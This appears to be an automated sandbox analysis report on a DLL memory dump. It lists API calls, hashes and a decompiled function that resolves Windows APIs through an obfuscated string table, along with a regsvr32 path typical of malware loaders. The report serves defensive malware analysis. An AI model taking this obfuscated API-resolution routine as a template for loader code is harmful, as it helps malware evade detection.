                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1724014008-0
                                                                                                                                                                                                                                                          • Opcode ID: 9a0b7cee1b695fc9ac521484e49976a5aa867618704d11b6b3dfa8b3dc2770c6
                                                                                                                                                                                                                                                          • Instruction ID: bb54a91b1a408e9fe4119dab77491465bcb21a1a3a0bc867c01dcfdf8542065a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0b7cee1b695fc9ac521484e49976a5aa867618704d11b6b3dfa8b3dc2770c6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821B0B2540109FFEB21BFA8DC85FAE7BBCEB49354F12806AF611D7140D73199468B61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE45818: _free.LIBCMT ref: 6DE4583D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4589E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458A9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE458B4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45908
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45913
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4591E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE45929
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction ID: baf96037eac13d19cd2360a1db81b5c30eff35fee0657e86b3a6d5557acc8f2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111A271548B48A6D660A770DC06FEB779CAF48704F938C2CE7AE66050CF65B4208F90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6DE43593
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE43772
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 6DE4378F
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,6DE3F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE437D7
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6DE43817
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DE438C3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4031098158-0
                                                                                                                                                                                                                                                          • Opcode ID: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction ID: 0c2daef5d81effb8130cf842e636622c31e7ec39b1acfa1e498102d46019e25c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9a1456767b8f1a9af424a558a5075b61f9a48a5c3680b5434ef53964b10e18
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D1A9B5D002599FCB15CFE8D880AEDFBB5BF49314F24806AE855BB381DB31A946CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t56 = E6DDF1C8F(0x20);
                                                                                                                                                                                                                                                          				if(_t56 == 0) {
                                                                                                                                                                                                                                                          					_v8 = 8;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					_t50 = GetModuleHandleA( *0x6ddf41d0 + 0x6ddf5014);
                                                                                                                                                                                                                                                          					_v8 = 0x7f;
                                                                                                                                                                                                                                                          					_t29 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf50e1);
                                                                                                                                                                                                                                                          					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                          					if(_t29 == 0) {
                                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                                          						E6DDF136A(_t56);
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t33 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf50f1);
                                                                                                                                                                                                                                                          						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                          						if(_t33 == 0) {
                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							_t36 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf5104);
                                                                                                                                                                                                                                                          							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                          							if(_t36 == 0) {
                                                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                          								_t39 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf5119);
                                                                                                                                                                                                                                                          								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                          								if(_t39 == 0) {
                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                          									_t42 = GetProcAddress(_t50,  *0x6ddf41d0 + 0x6ddf512f);
                                                                                                                                                                                                                                                          									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                          									if(_t42 == 0) {
                                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                          										_t46 = E6DDF18D1(_t56, _a12);
                                                                                                                                                                                                                                                          										_v8 = _t46;
                                                                                                                                                                                                                                                          										if(_t46 != 0) {
                                                                                                                                                                                                                                                          											goto L8;
                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                          											 *_a16 = _t56;
                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                          0x6ddf1ab3
                                                                                                                                                                                                                                                          0x6ddf1ab7
                                                                                                                                                                                                                                                          0x6ddf1b78
                                                                                                                                                                                                                                                          0x6ddf1abd
                                                                                                                                                                                                                                                          0x6ddf1ad5
                                                                                                                                                                                                                                                          0x6ddf1ae4
                                                                                                                                                                                                                                                          0x6ddf1aeb
                                                                                                                                                                                                                                                          0x6ddf1aef
                                                                                                                                                                                                                                                          0x6ddf1af2
                                                                                                                                                                                                                                                          0x6ddf1b70
                                                                                                                                                                                                                                                          0x6ddf1b71
                                                                                                                                                                                                                                                          0x6ddf1af4
                                                                                                                                                                                                                                                          0x6ddf1b01
                                                                                                                                                                                                                                                          0x6ddf1b05
                                                                                                                                                                                                                                                          0x6ddf1b08
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b0a
                                                                                                                                                                                                                                                          0x6ddf1b17
                                                                                                                                                                                                                                                          0x6ddf1b1b
                                                                                                                                                                                                                                                          0x6ddf1b1e
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b20
                                                                                                                                                                                                                                                          0x6ddf1b2d
                                                                                                                                                                                                                                                          0x6ddf1b31
                                                                                                                                                                                                                                                          0x6ddf1b34
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b36
                                                                                                                                                                                                                                                          0x6ddf1b43
                                                                                                                                                                                                                                                          0x6ddf1b47
                                                                                                                                                                                                                                                          0x6ddf1b4a
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b4c
                                                                                                                                                                                                                                                          0x6ddf1b52
                                                                                                                                                                                                                                                          0x6ddf1b58
                                                                                                                                                                                                                                                          0x6ddf1b5d
                                                                                                                                                                                                                                                          0x6ddf1b64
                                                                                                                                                                                                                                                          0x6ddf1b67
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1b69
                                                                                                                                                                                                                                                          0x6ddf1b6c
                                                                                                                                                                                                                                                          0x6ddf1b6c
                                                                                                                                                                                                                                                          0x6ddf1b67
                                                                                                                                                                                                                                                          0x6ddf1b4a
                                                                                                                                                                                                                                                          0x6ddf1b34
                                                                                                                                                                                                                                                          0x6ddf1b1e
                                                                                                                                                                                                                                                          0x6ddf1b08
                                                                                                                                                                                                                                                          0x6ddf1af2
                                                                                                                                                                                                                                                          0x6ddf1b86

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1C8F: HeapAlloc.KERNEL32(00000000,?,6DDF117D,?,00000000,00000000,?,?,?,6DDF1810), ref: 6DDF1C9B
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6DDF1272,?,?,?,?), ref: 6DDF1AC9
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,6DDF1272,?,?,?,?), ref: 6DDF1AEB
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,6DDF1272,?,?,?,?), ref: 6DDF1B01
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,6DDF1272,?,?,?,?), ref: 6DDF1B17
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,6DDF1272,?,?,?,?), ref: 6DDF1B2D
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,6DDF1272,?,?,?,?), ref: 6DDF1B43
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF18D1: memset.NTDLL ref: 6DDF1950
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$AllocHandleHeapModulememset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 426539879-0
                                                                                                                                                                                                                                                          • Opcode ID: a59566187f7080b23d4e1138834831f1fc1b37355828af8598f3045a5501f075
                                                                                                                                                                                                                                                          • Instruction ID: 8170811d60e1b98bba998f0ad9d20281b82669e3ab7ddce2c02f9b41ccdf9283
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a59566187f7080b23d4e1138834831f1fc1b37355828af8598f3045a5501f075
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB21F1F150060ADFD710FF69E940F6677F8EB0A784B028555F915C7211E731E9028BA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE391A7
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DE391B5
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DE391CE
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,6DE38DA8,6DE3700A,6DE37312), ref: 6DE39220
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction ID: beeee3ca464836ae6f426a96a93b45ba3c6297a59bd4f9d58c41d3c3ec9754b2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e380b7c209de50635fb5566feea3cfc6107445f7b8bdcfb927112e5c456a683
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D47224D6369EEB1955B56C88B7A36F4EB0377C733062DE620A61D0EF528851D140
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 1740715915-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
                                                                                                                                                                                                                                                          • Instruction ID: b96f7f787ae87b698e0b9b9e3e9bedae5aff02ac2117288a903840a2bb2cd1a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76e5482fc66c925455aa1b5ce90f098ca1bcbf84e27a9e621c347c61935eff3b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1519FB2A086239FDB1A8E55DC80BBA77A4FF45718F33452DE916962D0DF31E841C790
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6DE4120C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                          • API String ID: 0-3922119987
                                                                                                                                                                                                                                                          • Opcode ID: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction ID: 0f2e82e49dea864df4d875295f818627a349fc2bdccb5d8702f8b1dc0d03c57b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c749e2d4ba008c2660fa034f9073fb8ea25776f7cb4a2d28de819aa86a791e03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A21B371608216AF9F105FE5AC8096777BCAB4136C721C618FA28E7240FF31EC6197A4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457C7
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457D9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457EB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE457FD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE4580F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction ID: 4c6ab16b10501415342094093a920ecc4d1ccb2ada109573dd0611fe0c28dfc9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 381ed92e3f1534d124e9050bffa1bb327f74dfe3a711358359adfa0a082634e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F04932408225DBDB90DA59E8C4C7A73F9BB467187B28819F42CE7600CF31F890CEA4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                          • String ID: *?
                                                                                                                                                                                                                                                          • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                          • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction ID: 820e05b3ff5fe130afd44aac70e94c5517b75bf37d74d7d8dc87d43707ebdd3d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE617CB5E0421A9FCB14CFA9D8805EDFBF5EF88314B25816AE814F7340DB71AE418B90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6DE38E5F
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6DE38F13
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm$ym
                                                                                                                                                                                                                                                          • API String ID: 3480331319-4111166203
                                                                                                                                                                                                                                                          • Opcode ID: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction ID: 8a3c281821601d0eeeb11ea45d9d104d5452530c8ee51a0dbc291200f708c902
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e97a5bfdf0a398549adb7b33e8f400e3f6c969c3605169478636969f6cc65715
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B41C7349141299BCF04DF69CCC4ABEBBB5BF4531CF228159D914AB351CB32EA41CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 6DE398AB
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39991
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                          • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                          • Opcode ID: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction ID: 42be1ce98b41d84d42d050a7c4c2d7ac66ee565f5f8038376faa1365163e1fce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32ef6b4e60858bbd101c5b086ec171ac8ff0adf43bcebf84dc182cd933d817e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41597290422AAFCF05CF94CD80AFE7BB5BF48308F264099FA1977211DB35A951DB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,6DE6947C,00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C325
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,6DE69494), ref: 6DE3C338
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,6DE3C2C2,?,?,6DE3C28A,?,?,?), ref: 6DE3C35B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 4061214504-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction ID: 32957503c2ed312e37dd63c262b08937217ca9bbe547b66f44b02af49c5ecee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e639ec9dc02963fb2e5faf2fa4ed08f8fc0737349a26dd32cea1e44a59ea0dd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F08231600129FBDF02AB51CD49BEE7BB4EB04755F2100A4E905B1250CF71CE41DA90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DAD
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE46DD6
                                                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(00000000,6DE44603,00000000,6DE3FCD2,?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000), ref: 6DE46E08
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6DE44603,6DE3FCD2,00000000,?,?,?,?,00000000,?), ref: 6DE46E24
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1547350101-0
                                                                                                                                                                                                                                                          • Opcode ID: 4657d91ced63c4e8fc096fe7314f6762ff5e9998fa92bf7476a129e2c6ae6172
                                                                                                                                                                                                                                                          • Instruction ID: 746c7ccaf5103844d251ff9d8718369262052cba81f2b4a5b76cedebaae49d0f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4657d91ced63c4e8fc096fe7314f6762ff5e9998fa92bf7476a129e2c6ae6172
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 264117769046059BDB01AFB8EC00BEE37B5AF45368F32811CF624B72A0DF31D95587A1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DE410C1: _free.LIBCMT ref: 6DE410CF
                                                                                                                                                                                                                                                            • Part of subcall function 6DE41C1A: WideCharToMultiByte.KERNEL32(?,00000000,6DE3F667,00000000,00000001,6DE3F5F6,6DE43EDB,?,6DE3F667,?,00000000,?,6DE43C4A,0000FDE9,00000000,?), ref: 6DE41CBC
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DE40B07
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B0E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6DE40B4D
                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 6DE40B54
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 167067550-0
                                                                                                                                                                                                                                                          • Opcode ID: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction ID: 7d4071cadcf108e82e736539f580357e30e858956c8ca9733bc3adff1ab9b2a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b838fe768b3ecd280991d33289ed03799240ae7edb2787f24f33488fc80e67da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9721D871608616AFDB109FA79C80C6777BCEF5136C721C528F91897240DF31EC518B94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
